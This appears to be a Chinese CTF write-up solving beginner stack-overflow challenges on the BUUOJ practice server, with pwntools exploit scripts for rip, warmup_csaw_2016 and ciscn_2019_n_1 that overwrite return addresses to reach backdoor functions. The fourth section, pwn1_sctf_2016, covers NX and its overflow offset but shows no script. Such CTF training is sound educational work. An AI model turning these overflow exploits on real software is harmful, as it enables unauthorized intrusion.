一、rip
进入ida,F12,找后门函数的位置:0X401186
然后就是找栈溢出:
ps:32位程序中ebp为4个字节,64位中ebp为8个字节
发现有危险函数gets:
溢出的字符长度是F+8 = 23
1 2 3 4 5 6 7
| char s;
puts("please input"); gets(&s, argv); puts(&s); puts("ok,bye!!!"); return 0;
|
exp:
1 2 3 4 5 6
| from pwn import * p = remote('node4.buuoj.cn',26593) sys_addr= 0x40118A//后门函数命令 payload= b'a'*(0xF+8) + p64(sys_addr) p.sendline(payload) p.interactive()
|
exp:
1 2 3 4 5 6 7
| from pwn import * p = remote('node4.buuoj.cn',26593) sys_addr= 0x401186//后门函数所在的函数的地址 rt_addr= 0x401185//return地址 payload= b'a'*(0xF+8) + p64(rt_addr) + p64(sys_addr) p.sendline(payload) p.interactive()
|
二、warmup_csaw_2016
老样子,找后门函数,找了个cat命令
然后看溢出点:
是40+8
exp:
1 2 3 4 5 6
| from pwn import * p = remote('node4.buuoj.cn',29407) sys_addr= 0x400611 payload= b'a'*(0x40+8) + p64(sys_addr) p.sendline(payload) p.interactive()
|
三、ciscn_2019_n_1
先找关键代码,再看溢出:
exp:
1 2 3 4 5 6
| from pwn import * p = remote('node4.buuoj.cn',27561) sys_addr= 0x4006BE payload= b'a'*(0x30+8) + p64(sys_addr) p.sendline(payload) p.interactive()
|
exp:
1 2 3 4 5 6
| from pwn import * p = remote('node4.buuoj.cn',27561) sys_addr= 0x4006BE payload= b'a'*(0x30-4) + p32(0x41348000) p.sendline(payload) p.interactive()
|
四、pwn1_sctf_2016
这次是32位的了,但是有个NX保护
NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法,在开启NX后是不可行的
核心代码的意思是:将l转为you三个字节
fgets函数限制我们输入32的字节,但是溢出需要3C(60)字节,所以输入20个l即可,然后又是32位程序,再覆盖4个字节旧ebp,所以是21+1.